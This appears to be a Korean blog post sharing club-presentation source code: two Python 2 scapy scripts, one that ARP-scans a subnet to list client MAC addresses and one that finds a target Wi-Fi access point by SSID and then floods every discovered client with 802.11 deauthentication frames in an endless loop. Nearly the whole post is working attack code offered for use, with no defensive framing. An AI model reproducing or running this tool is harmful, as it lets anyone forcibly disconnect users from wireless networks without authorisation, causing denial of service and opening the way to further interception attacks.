cdor1's lab
DeAuth packet attack 본문
동아리 발표 소스이다.
강력한 패킷관련 라이브러리인 scapy모듈을 사용했다.
[*] up.py - arp패킷 활용, online인 호스트와 offline인 호스트 구분
#!/usr/bin/python
from scapy.all import *
import sys
r = '\033[31m' #red
b = '\033[34m' #blue
g = '\033[32m' #green
y = '\033[33m' #yellow
m = '\033[34m' #magenta
c = '\033[36m' #cyan
w = '\033[0m' #white
Timeout=1
macTable = []
conf.iface = "wlan0"
conf.verb = 0
def get_mac(ip_address):
responses,unanswered = srp(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst=ip_address),timeout=2,retry=10)
for s,r in responses:
return r.sprintf(r"%Ether.src%")
#r[Ether].src
#return 1
return None
def start_scan(ip):
for i in range(0,255):
answered,unanswered = srp(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst=ip+str(i)),timeout=Timeout)
if len(answered) > 0:
print(y + "[*] IP: "+ip+str(i)+"\n[*] MAC: " + get_mac(ip+str(i)) + w)
macTable.append(get_mac(ip+str(i)))
#print g + answered[0][0].getlayer(ARP).pdst, "is up" + w
elif len(unanswered) > 0:
print r + unanswered[0].getlayer(ARP).pdst, " is down" + w
print y + "[*] Open: " + str(macTable) + w
return macTable
[*] ap.py - DeAuth attack 수행
#!/usr/bin/env python
from scapy.all import *
from up import *
from time import *
import sys
r = '\033[31m' #red
b = '\033[34m' #blue
g = '\033[32m' #green
y = '\033[33m' #yellow
m = '\033[34m' #magenta
c = '\033[36m' #cyan
w = '\033[0m' #white
ap_list = []
ap_name = []
ban = []
check = 1
def mode(mode, iface):
os.system("sudo ifconfig " + iface + " down")
os.system("sudo iwconfig " + iface + " mode " + mode)
os.system("sudo ifconfig " + iface + " up")
def PacketHandler(pkt) :
if pkt.haslayer(Dot11) :
if pkt.type == 0 and pkt.subtype == 8 :
if pkt.addr2 not in ap_list :
ap_list.append(pkt.addr2)
ap_name.append(pkt.info)
print m + "[*] AP MAC: %s with SSID: %s " %(pkt.addr2, pkt.info) + w
if len(sys.argv) != 4:
print "Usage: sudo python2 " + sys.argv[0] + " (Managed mode connected)interface ip ssid"
print "Example: sudo python2 " + sys.argv[0] + " wlan0 192.168.1. cdor1"
sys.exit(1)
conf.iface = sys.argv[1]
print(m + "[*] SCAN WIFI..." + w)
ban = start_scan(sys.argv[2])
mode("monitor", sys.argv[1])
while check:
sniff(iface=sys.argv[1], prn = PacketHandler, count=1)
for i in range(len(ap_name)):
if ap_name[i] == sys.argv[3]:
bssid = ap_list[i]
check -= 1
print(y + str(ap_name) + w)
print(y + str(ap_list) + w)
myMac = get_if_addr(sys.argv[1])
print(c + "[*] START WIFI DEAUTH ATTACK: " + str(len(ban)) + " CLIENT!")
while 1:
for i in range(len(ban)):
if myMac != ban[i]:
for count in range(10):
packet = RadioTap()/Dot11(type=0,subtype=12,addr1=ban[i],addr2=bssid,addr3=bssid)/Dot11Deauth(reason=7)
sendp(packet, iface=sys.argv[1])
sleep(0.1)
print(g + "[*] ATTACK CILENT: " + ban[i] + w)
else:
print(g + "[*] MY MAC!!!" + w)